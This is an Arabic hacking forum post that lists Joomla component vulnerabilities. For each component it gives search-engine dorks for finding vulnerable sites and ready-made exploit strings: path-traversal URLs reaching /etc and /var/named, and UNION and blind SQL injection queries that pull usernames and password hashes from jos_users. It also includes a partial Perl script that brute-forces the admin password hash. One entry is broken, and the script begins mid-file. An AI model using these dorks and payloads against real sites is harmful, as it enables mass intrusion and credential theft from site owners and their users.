هلو هكريه اليوم جبت لكم هذا الموضوع
oomlaXplorer
ندخل الى محركات البحت
Sign In
و نبحت عن
كود PHP:
inurl:index.php?option=com_joomlaxplorer
او
كود PHP:
powered by joomlaXplorer
الاستغلال
كود PHP:
site.com/joomla/index.php?option=com_joomlaxplorer&action=show_err or&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc
site.com/joomla/index.php?option=com_joomlaxplorer&action=show_err or&dir=..%2F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed
--------------------------------------------------------------
powered by extplorer
نبحت عن
كود PHP:
powered by extplorer
او
كود PHP:
inurl:index.php?option=com_extplorer
الاستغلال
كود PHP:
site.com/joomla/index.php?option=com_extplorer&action=show_error&d ir=..%2F..%2F..%2F%2F..%2F..%2Fetc
site.com/joomla/index.php?option=com_extplorer&action=show_error&d ir=..%2F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed
----------------------------------------------------------
Joomla Component FlippingBook 1.0.4
نبحت عن
كود PHP:
inurl:com_flippingbook
الاستغلال
نبحت عن
كود PHP:
inurl:com_filiale
الاستغلال
كود PHP:
/index.php?option=com_filiale&idFiliale=-5+union+select+1,password,3,4,username,6,7,8,9,10, 11+from+jos_users
-------------------------------------------------------------------------
Joomla Component Profiler
نبحت عن
كود PHP:
allinurl:com_comprofiler
الاستغلال
كود PHP:
/index.php?option=com_comprofiler&task=userProfile& user=1/**/and/**/mid((select/**/password/**/from/**/jos_users/**/limit/**/0,1),1,1)/**/</**/Char(97)/*
-----------------------------------------------------------------------
Joomla Component JPad
نبحت عن
كود PHP:
allinurl:com_jpad
الاستغلال
كود PHP:
index.php?option=com_jpad&task=edit&Itemid=39&cid=-1 UNION ALL SELECT 1,2,3,concat_ws(0x3a,username,password),5,6,7,8 from jos_users--
-----------------------------------------------------------------------
Joomla Component yvcomment
نبحت عن
كود PHP:
inurl:yvcomment
الاستغلال
كود PHP:
exit;
}
my $host = $ARGV[0];
my $path = $ARGV[1];
my $userid = 1;
my $aid = $ARGV[2];
my %options = ();
GetOptions(%options, "u=i", "p=s", "a=i");
print "[~] Exploiting...\n";
if($options{"u"})
{
$userid = $options{"u"};
}
if($options{"a"})
{
$aid = $options{"a"};
}
syswrite(STDOUT, "[~] MD5-Hash: ", 14);
for(my $i = 1; $i <= 32; $i++)
{
my $f = 0;
my $h = 48;
while(!$f && $h <= 57)
{
if(istrue2($host, $path, $userid, $aid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
if(!$f)
{
$h = 97;
while(!$f && $h <= 122)
{
if(istrue2($host, $path, $userid, $aid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
}
}
print "\n[~] Exploiting done\n";
sub istrue2
{
my $host = shift;
my $path = shift;
my $uid = shift;
my $aid = shift;
my $i = shift;
my $h = shift;
my $ua = LWP::UserAgent->new;
my $query = "http://".$host.$path."index.php?option=com_yvcomment& view =comment&ArticleID=".$aid." and ascii(SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1))=".$h."";
if($options{"p"})
{
$ua->proxy('http', "http://".$options{"p"});
}
my $resp = $ua->get($query);
my $******* = $resp->*******;
my $regexp = "DateAndAuthor";
if($******* =~ /$regexp/)
{
return 1;
}
else
{
return 0;
}
}
--------------------------------------------------------------------------
Joomla Component jabode
نبحت عن
كود PHP:
inurl:com_jabode
الاستغلال
كود PHP:
http://localhost/[Joomla_Path]/index.php?option=com_jabode&task=sign&sign=taurus& id=-2 UNION SELECT user(),user(),user(),user(),concat(username,0x3a,p assword) FROM jos_users
بالنهاية اتمنى يكون الموضوع مفيد للجميع و عدم استخدامه الا في طاعة اللًه و رسولة ..
اللهم بلغت اللهم فاشه
أخوكم : ThE-WolF
الرئيسية
.
شركة
استضافة .
مركز
تحميل
.
الإسلام
.
مكتبة
الفيديو
.
المجموعة البريدية
.
خدمات
للمواقع
.
اتصل بنا
أحدرت لكم أكتر من 10 ثغرات و كيفيت الاستغلال
العرض العادي
